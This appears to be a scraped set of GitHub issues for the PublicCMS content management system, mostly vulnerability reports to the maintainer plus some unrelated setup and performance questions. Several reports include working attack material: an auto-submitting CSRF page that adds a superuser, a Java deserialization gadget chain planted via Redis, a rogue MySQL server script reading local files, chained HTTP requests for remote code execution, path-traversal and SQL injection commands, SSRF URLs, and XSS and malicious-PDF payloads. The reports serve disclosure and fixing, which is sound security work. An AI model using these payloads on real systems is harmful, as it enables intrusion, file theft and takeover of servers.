Background storage XSS
step1：
https://cms.publiccms.com/case.html Submit case

step2：
Administrator review submit case trigger xss

Click to trigger xss

Hello,I found a bug that the administrator account login ip is at risk of being forged while logging in

the question is as follows：

如题，我想知道这个项目，有没有关于统计方面的东西呢，有统计到哪些数据呢？

为什么工程全是错误？

Hello,my nickname is isecream,I found a stored xss in the logo

First, access the page

the logo is obtained from database.

Then，i write the xss payload to the database via /publiccms/admin/sysSite/sql.html

you can see,the value has been changed

And then,access the last page

so,there is a stored xss in the all logo

URL redirection 302 vulnerability

poc：

https://cms.publiccms.com/admin/changeLocale?lang=&returnUrl=https://github.com/sanluan/PublicCMS/issues/?https://cms.publiccms.com/admin/

Site redirection does not require login, bypasses judgment to redirect to the current domain name, bypasses the current domain name as a parameter

你好,我在查看PublicCMS代码时发现一个问题:
在文件
/publiccmscore/src/main/java/com/publiccms/controller/admin/cms/CmsCategoryAdminController.java103行
代码 if (null != oldEntity.getParentId() && oldEntity.getParentId() != entity.getParentId()) {

使用了!=比较基本类型的包装类;
!=运算符当两个操作数(oldEntity.getParentId(),entity.getParentId())都是包装器类型时，判定标准为他们是否指向同一个对象;而没有比较两个操作数的值。

同时由于Integer在[-128,127]值之间有缓存,所以使用!=比较Integer在Integer的值都在[-128,127]之间会返回正确结果,其他情况下都会有问题。

when I login, i find if i use a wrong username:

So we can use brute force to get the correct username beacuse the correct username has different response lenth

after we got the correct username,use the same way to get the correct password

302 redirect means we login successful

PublicCMS V4.0.202204.d has a vulnerability known as Cross-Site Request Forgery (CSRF). Located in the background--> maintenance--> user management--> increase users. The vulnerability could lead to the addition of administrator account management owner content or the addition of department head account management department owner content

1.Enter the background--> maintenance--> user management--> increase users

2.Simulates the request to increase the number of users and constructs a payload

The figure above shows the constructed payload, adding an administrator through CSRF implementation, the account is "TestUser", the password is "test", and the user name is "CSRFTEST"
3.The browser opens the file

Refresh the background user management page:

Test whether the newly added administrator can log in


Login successful！

问题

经过测试我们发现在数据库中添加一些索引可以提高部分常用查询的效率（大部分提升性能高于%85，即节省超过85%的时间开销）。

1.cms_content_related.related_content_id

从CmsContentRelatedDao中可以看出在查询cms_content_related表时查询条件经常会包含related_content_id，通过实际的测试收集数据库log，我们发现不少查询条件仅包含related_content_id，无法使用现有的联合索引，因此可以单独为related_content_id建立索引从而极大地提高相关查询语句的效率。

2.cms_word.site_id

从CmsWordDao中可以看出在查询cms_word表是查询条件往往都包含有site_id，测试并查询数据库日志后确实如此，且存在许多查询条件仅包含site_id的查询语句，因此可以单独为site_id建立索引从而提高相关语句的查询效率。

3.sys_cluster.(heartbeat_date,master)

从SystemClusterDao中可以看出，在查询表sys_cluster时master和heartbeat_date是两个经常共同出现的查询条件，测试过程的数据库查询日志结果符合预期，因此可以建立（heartbeat_date, master）联合索引从而加快查询速度。

4.sys_dept_page.page

从SystemDeptPageDao中可以看出，查询表sys_dept_page时查询条件往往包含dept_id和page，已经建立了(dept_id, page)的索引，但通过分析数据库查询日志可以发现有时候会仅通过page来查询，因此需要单独为page添加索引从而加快相关查询语句的效率。

5.sys_module_lang.lang

从SysModuleLangDao中可以看出，查询表sys_module_lang时常用的查询条件为module_id和lang，已有索引(module,lang)，但是从数据库查询日志中看出存在单独使用lang进行查询的情况，因此需要为lang单独添加索引加快相关查询速度。

6.sys_role_module.module_id

从SysRoleModuleDao中可以看出，查询表sys_role_module时常用的查询条件为role_id和module_id，已有索引(role_id,module_id)，但是从数据库查询日志中看出存在单独使用module_id进行查询的情况，因此需要为module_id单独添加索引加快相关查询速度。

7.sys_role_user.user_id

从SysRoleUserDao中可以看出，查询表sys_role_user时常用的查询条件为role_id和user_id，已有索引(role_id,user_id)，但是从数据库查询日志中看出存在单独使用user_id进行查询的情况，因此需要为user_id单独添加索引加快相关查询速度。

8.sys_site.parent_id

从SysSiteDao中可以看出，查询表sys_site时常用的查询条件为disabled、parent_id和name，从数据库查询日志中看出存在单独使用parent_id进行查询的情况，因此需要为parent_id单独添加索引加快相关查询速度。

9.sys_user.site_id

从SysUserDao中可以看出，site_id为查询sys_user时常用的一个条件，数据库的查询日志的结果也确实如此，因此需要为site_id单独添加索引加快相关查询速度。

解决方法

添加下列索引
cms_content_related.related_content_id
cms_word.site_id
sys_cluster.(heartbeat_date,master)
sys_dept_page.page
sys_module_lang.lang
sys_role_module.module_id
sys_role_user.user_id
sys_site.parent_id
sys_user.site_id

Hello,I found a Deserialization vulnerability in the lastest version of PublicCMS- V4.0.202302.e

The prerequisite for this vulnerability is that the website uses redis cache and needs to obtain redis control permission to initiate deserialization, because redis will trigger deserialization when obtaining the value through the get function.

Then there is the deserialization gadget chain. Jackson and spring exist in the website dependencies. After testing, you can use the following deserialization chain.

BadAttributeValueExpException->POJOnode->TemplatesImpl。

The core code is as follows

    public static void main( String[] args ) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("a");
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        ctClass.setSuperclass(superClass);
        CtConstructor constructor = new CtConstructor(new CtClass[]{},ctClass);
        constructor.setBody("open -a /System/Applications/Calculator.app");
        ctClass.addConstructor(constructor);
        byte[] bytes = ctClass.toBytecode();
        TemplatesImpl templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templatesImpl, "_name", "boogipop");
        setFieldValue(templatesImpl, "_tfactory", null);
        POJOnode1 jsonNodes = new POJOnode1(templatesImpl);
        BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(exp,jsonNodes);
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(exp);
        FileOutputStream fout=new FileOutputStream("1.ser");
        fout.write(barr.toByteArray());
        fout.close();
        FileInputStream fileInputStream = new FileInputStream("1.ser");
        System.out.println(serial(exp));
        deserialize(serial(exp));
    }
        public static byte[] serial(Object o) throws IOException, NoSuchFieldException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.close();
        String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
        System.out.println(bytesToHex(baos.toByteArray()));
// 设置Redis数据库连接参数
        String host = "localhost";
        int port = 6379;
        String password = "root";
        Jedis jedis = new Jedis(host, port);
        jedis.auth(password);
        jedis.set("test".getBytes(), baos.toByteArray());
        return baos.toByteArray();

    }

But you need to pay attention to one detail. You need to rewrite a writeReplace method, because this function will replace some data during the serialization process, causing deserialization errors.

Reconstruct the BaseJsonNode.writeReplace function in the jar package, making sure to keep the path consistent.

If you only need to try rce locally, you can write it more conveniently like this.Rewrite it with the following code

import com.fasterxml.jackson.databind.node.POJONode;

import java.util.GregorianCalendar;

public class POJOnode1 extends POJONode {
    public POJOnode1(Object v) {
        super(v);
    }

    Object writeReplace() {
        GregorianCalendar NodeSerialization;
        return this;
    }
}

so now, you can use the above code to write the serialized hex data to redis。

When you use redis cache, the database will become like this

So if you can control the redis database at this time, you only need to change one of the domain.localhost or some other impairment to trigger deserialization to reach rce。Like the following main

Just visit the website now。

The Add administrator Function is not check referer and token

POC:

<html>
  <!-- CSRF PoC  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/127.0.0.1:8080\/publiccms\/admin\/sysUser\/save.do?callbackType=closeCurrent&navTabId=sysUser\/list", true);
        xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9,en;q=0.8");
        xhr.withCredentials = true;
        var body = "id=&name=testvul&superuserAccess=on&deptId=1&deptName=%E6%8A%80%E6%9C%AF%E9%83%A8&password=123456&repassword=123456&nickName=testvul&email=test%40gmail.com&roleIds=1";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Building a page and inducing administrator access can add a user with super privileges.

在最新版本下

漏洞触发点：/admin/sysSite/doUploadSitefile

针对上传文件名originalName没有做过滤，可以通过../../实现路径穿越，从而在任意位置写入文件（但文件名必须满足后缀-site.zip）

测试：发送如下报文

成功使文件写入到E:/目录下

测试单位：山东大学网络空间安全学院

我看了下源码现在很多接口类里面的变量和方法都声明了public，可以去掉，@sanluan 你觉得怎样？

Hello,I found a SSRF vulnerability in the lastest version of PublicCMS- V4.0.202302.e

The vulnerability lies in the fact that there is no protection when using ueditor to obtain image resources, so that HTTP can be used to request any URL for ssrf.

So just get the request directly

When detecting the internal network port, if the port does not exist, a rejection will be returned.

If it exists, return error

首先可以看到是最新版本
由于我没有激活，所以我做了一个patch


我们登入后台
输入exp
jdbc:mysql://192.168.1.132:3309/mysql?useSSL=false&allowLoadLocalInfile=true
这里关键要加上allowLoadLocalInfile

同时运行下面的exp

# -*- coding:utf-8 -*-
import socket
import binascii
import os



def receive_data(conn):
    data = conn.recv(1024)
    #print("[*] Receiveing the package : {}".format(data))
    return data

def send_data(conn,data):
    #print("[*] Sending the package : {}".format(data))
    conn.send(binascii.a2b_hex(data))




def run():

    while 1:
        conn, addr = sk.accept()
        print("Connection come from {}:{}".format(addr[0],addr[1]))

        
        b="5b0000000a352e362e32382d307562756e7475302e31342e30342e31002d000000403f59264b2b346000fff70802007f8015000000000000000000006869595f525f635560645352006d7973716c5f6e61746976655f70617373776f726400"
        send_data(conn,b)
        data=receive_data(conn)
        b="0700000200000002000000"
        send_data(conn,b)
        data=receive_data(conn)
        filename=b"C:\\Windows\\win.ini"
        wantfile = chr(len(filename) + 1).encode() + b"\x00\x00\x01\xFB" + filename
        #b="0c000001fb2f6574632f706173737764"
        #send_data(conn,b)
        #print(wantfile)
        conn.send(wantfile)
        data=receive_data(conn)
        print(data)
        b="0700000400000002000000"
        send_data(conn,b)
        data=receive_data(conn)
            


if __name__ == '__main__':
    HOST ='0.0.0.0'
    PORT = 3309
    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sk.bind((HOST, PORT))
    sk.listen(1)

    print("start fake mysql server listening on {}:{}".format(HOST,PORT))
    run()

这里我读取的是win.ini

可以看到成功读出来
修复建议:
建议把比如说只允许用户输入ip 端口
然后我们把ip和端口替换成默认的jdbc语句中，防止用户控制allowLoadLocalInfile

问题

在数据库查询记录中我们发现了存在如下查询语句：
select count(*) as col_0_0_ from sys_domain sysdomain0_
select count(*) as col_0_0_ from sys_cluster syscluster0_
这类语句是在相应的表中执行分页查询时为统计全表行数产生的，新版本的Mysql中默认使用了InnoDB作为数据库引擎，在InnoDB中不会缓存表的元数据，因此执行这样的语句会造成比较大的时间开销，而MyISAM则缓存有表的元数据，统计行数可以在很短的时间内完成。如果没有其它必须使用InnoDB的原因，建议修改这两张表的存储引擎为MyISAM从而优化这类全表count语句。
参考：https://dev.mysql.com/doc/refman/8.0/en/group-by-functions.html#function_count

解决方法

修改sys_cluster和sys_domain的存储引擎为MyISAM

访问没响应

mkdir cms && chmod 777 cms

docker run --name=cms -d -e "PORT=8866" \
-e "CONTEXTPATH=/publiccms" -e "FILEPATH=/data/publiccms" \
-p 8866:8866 -v `pwd`/cms:/data/publiccms \
sanluan/publiccms:latest

查看日志

docker logs -f cms
。。。
balabala
。。。
INFO: FrameworkServlet 'ApiInitializer': initialization completed in 245 ms
Jan 03, 2020 3:06:15 AM org.springframework.boot.web.embedded.tomcat.TomcatWebServer start
INFO: Tomcat started on port(s): 8866 (http) with context path '/publiccms'
Jan 03, 2020 3:06:15 AM boot.SprintBootApplication logStarted
INFO: Started SprintBootApplication in 32.365 seconds (JVM running for 34.601)

进容器依然无响应

docker exec -it cms bash

root@a838975fd1b5:/# curl 127.0.0.1:8866/publiccms
root@a838975fd1b5:/# curl 127.0.0.1:8866
root@a838975fd1b5:/# ls /data/publiccms/
dict  indexes  task  temp  template

Storage XSS
On this page as shown in the figure,

click 创建文件

As shown in the figure below, creat xx.html file， enter <script>alert(1)</script>，click 保存

Then click 查看

Trigger vulnerability

In the selection of planned tasks, the parameters are controllable and repo can be echoed directly, so the parameters of the parameters will be imported into the default bat warehouse script and the executed commands can be echoed
url：http://10.70.40.114:8080/publiccms/admin/#site_sysSite/script

The parameters of the parameters should be controlled

版本:V4.0.180707, spring boot 启动

ver: V4.0.20180210
using a specially crafted zip archive, that holds path traversal filenames.when you used unzip method you will get a shell

a zip looks like this:

the path you will get from there:

(so,your website true path is 'C:\tomcat\apache-tomcat-7.0.81\apache-tomcat-7.0.81\webapps\publiccms')

upload and unzip

'cmd.jsp' will write into your server

Execute the command

shell.zip

java version "17.0.7" 2023-04-18 LTS
Java(TM) SE Runtime Environment (build 17.0.7+8-LTS-224)
Java HotSpot(TM) 64-Bit Server VM (build 17.0.7+8-LTS-224, mixed mode, sharing)

Window 10 x64

1.Vulnerability description
Because files can be uploaded and online preview function is provided, pdf files and html files containing malicious code are uploaded, and xss popup window is realized through online viewing

2.Vulnerability exploitation process
Function point：
Development - Website file management - Upload files - Click to view

3.XSS vulnerability hazards
After a successful attack using xSs code, malicious users may get high permissions. The XSS vulnerability mainly has the following hazards:
(1) Steal various user accounts;
(2) Steal the user's Cookie information, impersonate the user's identity to enter the website;
(3) Hijack user sessions and perform arbitrary operations; Refers to operating the user's browser:
(4) Brush stream display, execution of commercial advertising:
(5) Spread worms.
And so on

4.POC（pdf）
Copy the following code into a text file and modify the suffix to pdf

%PDF-1.3
%忏嫌
1 0 obj
<<
/Type /Pages
/Count 1
/Kids [ 4 0 R ]
>>
endobj
2 0 obj
<<
/Producer (PyPDF2)
>>
endobj
3 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/Names <<
/JavaScript <<
/Names [ (0b1781f6\0559e7f\0554c59\055b8fd\0557c4588f0d14c) 5 0 R ]
>>
>>
>>
endobj
4 0 obj
<<
/Type /Page
/Resources <<
>>
/MediaBox [ 0 0 72 72 ]
/Parent 1 0 R
>>
endobj
5 0 obj
<<
/Type /Action
/S /JavaScript
/JS (app\056alert\050\047xss\047\051\073)
>>
endobj
xref
0 6
0000000000 65535 f 
0000000015 00000 n 
0000000074 00000 n 
0000000114 00000 n 
0000000262 00000 n 
0000000350 00000 n 
trailer
<<
/Size 6
/Root 3 0 R
/Info 2 0 R
>>
startxref
445
%%EOF

5.Modification suggestion
It is recommended that you do not enable the online viewing function for pdf and html, and click to view the source file directly

拉了现在的版本打包部署后，detail.html?id=1 动态页面上 无法取到id, freemark ${id} 报错。是我少了什么设置吗？

In the development - file management - page fragment template, template search and replacement can be performed, with the corresponding interface as follows:


The request for replacement is as follows:
The corresponding code is in com.publiccms.controller.admin.cms.CmsTemplateAdminController#replace.

The focus is on CmsFileUtils.replaceFileList;, which performs a straightforward line-by-line replacement of file content. The file to be replaced is determined by File file = Paths.get(dirPath, result.getPath()).toFile();. No checks are performed, and it can replace the content of any file by specifying it in the request. This can potentially lead to the replacement of SSH public keys and scheduled tasks, among other things.

Let's take a look at the script execution functionality provided in the backend.

对应代码在com.publiccms.controller.admin.sys.SysSiteAdminController#execScript


It's important to note that FileUtils.copyInputStreamToFile; is used to copy pre-written script content to the PublicCMS/publiccms-parent/publiccms/data/publiccms/script; directory. Finally, the script path is concatenated, and runtime.exec is used to execute it.

Given that we can replace the content of any file in a previous step, it becomes possible to replace the content of the four predefined scripts and then execute them, potentially leading to Remote Code Execution (RCE).
So, the steps to exploit this vulnerability would be as follows:

1. Access /admin/sysSite/execScript to execute sync.sh. This will copy a sync.sh script under PublicCMS/publiccms-parent/publiccms/data/publiccms/script.

POST /admin/sysSite/execScript?navTabId=sysSite/script HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 70
Origin: http://localhost:18080
Connection: close
Referer: http://localhost:18080/admin/
Cookie: theme=; theme_name=; csrftoken=nagG0EofiBEBUgPkAO3ZHUODrtD5867I; Hm_lvt_c35e3a563a06caee2524902c81975add=1681284434,1681372182; Goland-6d468fe8=7f0149f3-a68b-4909-aff4-4831a68cc331; JSESSIONID=EBBE1DE1D5FFBD89A913A1D70DAC1E0F; PUBLICCMS_ANALYTICS_ID=f945b9f2-19bd-4c7a-8ab0-28384011ddb8; PUBLICCMS_ADMIN=1_fadb2fab-2700-4f54-a679-6e6deb1a5ad4
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

_csrf=fadb2fab-2700-4f54-a679-6e6deb1a5ad4&command=sync.sh&parameters=

2. Use /admin/cmsTemplate/replace to perform cross-directory replacement of any file content. This allows you to replace SSH keys or the content of the sh files mentioned above.

POST /admin/cmsTemplate/replace?navTabId=placeTemplate/list HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
Origin: http://localhost:18080
Connection: close
Referer: http://localhost:18080/admin/
Cookie: theme=; theme_name=; csrftoken=nagG0EofiBEBUgPkAO3ZHUODrtD5867I; Hm_lvt_c35e3a563a06caee2524902c81975add=1681284434,1681372182; Goland-6d468fe8=7f0149f3-a68b-4909-aff4-4831a68cc331; JSESSIONID=EBBE1DE1D5FFBD89A913A1D70DAC1E0F; PUBLICCMS_ANALYTICS_ID=f945b9f2-19bd-4c7a-8ab0-28384011ddb8; PUBLICCMS_ADMIN=1_fadb2fab-2700-4f54-a679-6e6deb1a5ad4
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

_csrf=fadb2fab-2700-4f54-a679-6e6deb1a5ad4&word=-echo&replace=-echo%3bopen+-a+calculator.app&replaceList%5B0%5D.path=../../script/sync.sh&replaceList%5B0%5D.indexs=0

3. Access /admin/sysSite/execScript again to execute sync.sh, which may lead to Remote Code Execution (RCE). The request package should be the same as in step 1.
   

First you should login demo account,

Directory Traversal POC:

GET /admin/cmsWebFile/list.html?path=../../../../../root&_=1529029023591 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close

Arbitrary file read POC:

GET /admin/cmsTemplate/content.html?path=../../../../../../../../../root/.bash_history&_=1529029023587 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close

You can use these two poc brower system dir and read any file~

Where SQL injection vulnerability code appears
com.publiccms.controller.admin.sys.SysSiteAdminController

`@RequestMapping("execSql")

@Csrf

public String execSql(@RequestAttribute SysSite site, @SessionAttribute SysUser admin, String sql, HttpServletRequest request,

        ModelMap model) {

    if (ControllerUtils.verifyCustom("noright", !siteComponent.isMaster(site.getId()), model)) {

        return CommonConstants.TEMPLATE_ERROR;

    }

    if (-1 < sql.indexOf(CommonConstants.BLANK_SPACE)) {

        String type = sql.substring(0, sql.indexOf(CommonConstants.BLANK_SPACE));

        try {

            if ("update".equalsIgnoreCase(type)) {

                model.addAttribute("result", sqlService.update(sql));

            } else if ("insert".equalsIgnoreCase(type)) {

                model.addAttribute("result", sqlService.insert(sql));

            } else if ("delete".equalsIgnoreCase(type)) {

                model.addAttribute("result", sqlService.delete(sql));

            } else {

                model.addAttribute("result", JsonUtils.getString(sqlService.select(sql)));

            }

        } catch (Exception e) {

            model.addAttribute("error", e.getMessage());

        }

        model.addAttribute("sql", sql);

        logOperateService.save(new LogOperate(site.getId(), admin.getId(), LogLoginService.CHANNEL_WEB_MANAGER,

                "execsql.site", RequestUtils.getIpAddress(request), CommonUtils.getDate(), JsonUtils.getString(model)));

    }

    return CommonConstants.TEMPLATE_DONE;

}`

sqlService.update(sql)=>SqlMapper.xml
<mapper namespace="com.publiccms.logic.mapper.tools.SqlMapper"> <select id="select" parameterType="String" resultType="map">${sql}</select> <select id="query" parameterType="String" resultType="map">${sql}</select> <insert id="insert" parameterType="String">${sql}</insert> <update id="update" parameterType="String">${sql}</update> <delete id="delete" parameterType="String">${sql}</delete> </mapper>

Url address is http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql
post data:"_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221"
Parameter 'sql' is not filtered and controllable
we can use sqlmap to test the vulnerability:
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "PUBLICCMS_ADMIN=1_353b342a-075c-4a71-9f13-c20e5b30b603; JSESSIONID=BBA83A42D2455445CFE0A504F287C9DB; Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221" --level 3 --dbms mysql

sqlmap identified the following injection point(s) with a total of 751 HTTP(s) requests:

Parameter: sql (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: _csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=(SELECT * FROM (SELECT(SLEEP(5)))CKuT)

[20:45:23] [INFO] the back-end DBMS is MySQL web application technology: JSP
back-end DBMS: MySQL >= 5.0.12

view the tables in PublicCMS databases:
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "JSESSIONID=70640223FE44003BC029AAAB54D24BC8; PUBLICCMS_ADMIN=1_2df43cfb-9546-4cdb-8150-6482f1b028de;Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=2df43cfb-9546-4cdb-8150-6482f1b028de&sql=111" --level 5 -D publiccms --tables

how to fix:
${} （不安全的写法）
使用 ${foo} 这样格式的传入参数会直接参与SQL编译，类似字符串拼接的效果，是存在SQL注入漏洞的。

#{}
使用 #{} 做参数绑定时， MyBatis 会将SQL语句进行预编译，避免SQL注入的问题。

Hello,I found a SSRF in the lastest version of PublicCMS-V4.0.202011.b

The vulnerability is triggered by visiting the following address after logging in the management background
http://192.168.6.237:8081/publiccms/admin/ueditor?action=catchimage&file%5b%5d=http://192.168.103.3
http://192.168.6.237:8081/publiccms/admin/ueditor?action=catchimage&file%5B%5D=https://www.baidu.com

The "file[]" parameter has a loophole, and the IP and domain names that access is not restricted, resulting in an SSRF loophole.
Error is returned when the detection service and port are not open:

Return success when detecting service and port opening:

Attackers can use this vulnerability to scan the internal network for open hosts and ports, and attack applications with vulnerabilities in the internal network, such as redis, struts2, etc., and further gain control of the server system.

PublicCMS is a useful development cms, I think we need to pay attention to and fix this security issue， looking forward to your reply.

服务器centos7 tomcat8 jdk1.8.0_201.
后台新增了一个站点，对应的nginx配置也按照推荐配置好了，访问第二个站点的前台地址和后台地址也都能访问，只是访问后台时输入用户名和密码后没有反应，也没报任何错误。

登陆http://localhost:8080/publiccms/admin/
输入用户名密码 admin admin
提示用户名密码错误

1.After logging into the backend system，add an application authorization to obtain an appKey and appSecret

2.Obtain apptoken through the /api/appToken interface with appkey and appsecret

3.The SSRF vulnerability exists in the "parameters" parameter of the /api/method/getHtml interface, which can be used to access the website of intranet,for example,access 127.0.0.1:8080/admin and return the page content.

4.In addition, it can also be used to detect open ports on the intranet system.
When the port is open, the response time is only a few milliseconds, but when the port is not open, the response time is about 2000 milliseconds.This obvious response time difference can be used to determine whether the port is open.

5.The vulnerability entrance is in MethodController.java. It receives an "appToken" and "parameters" parameter, assigns the "parameters" parameters to the list, and then calls method.execute(request, list), the "method" is the method specified by {name}

6.When {name} is "getHtml", enter theexecute(@SuppressWarnings("unused") HttpServletRequest request, List<TemplateModel> arguments)method of BaseMethod.java

7.Then enter the execute(List<TemplateModel> arguments) method of GetHtmlMethod.java, take the values from the incoming parameters and assign them to the "url" and "body", and then determine whether the "body" is empty. If not, send a post request to the "url". If it is empty, send a get request to the "url".

8.After sending the request, the returned content is directly returned to the client. During this period, no detection is made on whether the "paramaters" parameter is illegal, and there is no detection of ssrf-related interceptors, so ssrf can be directly performed and obtained through the server request. Any URL address can be used to access some sensitive resources on the intranet or detect the port of the intranet system.

v2017版本中，页面>页面片段管理>添加推荐位数据
手动输入推荐位数据时（非选择已发布文章）无法遍历出数据

在ubuntu上通过docker启动了publiccms，无法通过IP访问到publiccms的初始化界面。
是否默认只支持localhost方式，或者需要某些配置才可。

Insert the xss payload into the background database, and then trigger the xss vulnerability

存储型XSS

在如图所示这个页面，

点击创建文件

如下图所示创建xx.html，输入<script>alert(1)</script>，点击保存

然后点击查看

触发漏洞

也是在文件管理，不过跟之前那位提的不一样，这个是文件名处的解析，不是文件内容（我试了下，文件内容的已经不能触发了，看了下已经转义了）

直接创建文件或者上传也行，文件名中带有xss的payload，如上图所示

点击修改，打开的新标签可以触发


可以看到触发位置是在标签栏里的文件名展示处

版本：

纯后台的话，危害不大，，我没在默认模板找到提供前台操作这个web文件管理系统的，不清楚原有设计是否包含这种情况，如果前台能操作到的话，还是有较高风险的

Hello,I found a xss in the version of PublicCMS-4.0.190312
1.Add category type

POST /publiccms/admin/cmsCategoryType/save.do?callbackType=closeCurrent&navTabId=cmsCategoryType/list HTTP/1.1
Host: 10.211.55.8:9999
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 499
Connection: close
Referer: http://10.211.55.8:9999/publiccms/admin/
Cookie: JSESSIONID=E5E9BE2169830DBF8DD9D76A600E682A; PUBLICCMS_ADMIN=1_a4652846-7dba-43b6-9b00-588d24009661; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1566047983; lang=gb; __atuvc=2%7C34; cms.locale=zh

id=2&_csrf=a4652846-7dba-43b6-9b00-588d24009661&name=xxs_test&sort=0&dwz_rowNum=1&categoryExtends%5B0%5D.id.extendId=2&categoryExtends%5B0%5D.id.code=gdb&categoryExtends%5B0%5D.inputType=file&categoryExtends%5B0%5D.name=xxs_test&categoryExtends%5B0%5D.defaultValue=&categoryExtends%5B0%5D.maxlength=&categoryExtends%5B0%5D.dictionaryId=&categoryExtends%5B0%5D.dictionaryName=&categoryExtends%5B0%5D.description='"/></textarea><svg onload=alert('one')>&categoryExtends%5B0%5D.sort=0

2.And then click the above button trigger xss

Hey there!

I belong to an open source security research community, and a member (@EffectRenan) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

PublicCMS v4.0 Value parameter has command execution vulnerability

Vulnerability Type :

command execution

Vulnerability Version :

4.0

##Vulnerability location：
PublicCMS-4.0.202107.c/publiccms-parent/publiccms-core/src/main/java/com/publiccms/co
ntroller/admin/sys/SysSiteAdminController.java:249

Vulnerability Description AND recurrence:

Manual audit of publiccms source code，a command execution vulnerability was discovered

Vulnerable link 1: PublicCMS-4.0.202107.c/publiccms-parent/publiccms-core/src/main/java/com/publiccms/contr
oller/admin/sys/SysSiteAdminController.java:211

parameters is the source of taint, value:<>（parameters是污点来源，value:<>）

Vulnerable link 2：PublicCMS-4.0.202107.c/publiccms-parent/publiccms- core/src/main/java/com/publiccms/controller/admin/sys/SysSiteAdminController.java:223

The stain is passed from parameters to cmdarray, value:<>（污点从parameters传递至cmdarray，value:<>）

Vulnerable link 3：PublicCMS-4.0.202107.c/publiccms-parent/publiccms-core/src/main/java/com/publiccms/contr
oller/admin/sys/SysSiteAdminController.java:249
RCE type risk trigger, caused by the input parameter cmdarray, value:<> (RCE类型风险触发，由入参cmdarray导致，value:<>)